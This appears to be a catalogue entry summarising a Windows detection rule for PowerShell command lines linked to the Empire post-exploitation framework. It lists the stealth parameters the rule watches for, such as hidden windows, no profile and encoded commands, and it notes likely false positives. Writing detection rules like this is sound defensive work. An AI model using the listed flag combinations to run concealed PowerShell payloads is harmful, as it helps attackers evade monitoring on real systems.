
Summary
This detection rule targets the execution of suspicious PowerShell command line parameters commonly associated with the Empire tool, which is a post-exploitation framework utilized by threat actors for various malicious activities. The rule monitors the 'process_creation' log category within Windows environments, focusing on PowerShell instances that incorporate a combination of parameters that obscure execution and potentially evade defenses. Key parameters being tracked include '-NoP', '-sta', '-NonI', '-W Hidden', and encoded commands, which are indicative of attempts to execute payloads or scripts in a stealthy manner. The selection condition delineates specific combinations that, when identified within command line arguments, trigger an alert due to their common usage in nefarious contexts. False positives may arise from legitimate tools that are designed for similar administrative or automation tasks, posing challenges in distinguishing between benign and malicious usage.
Categories
- Endpoint
- Windows
Data Sources
- Process
Created: 2019-04-20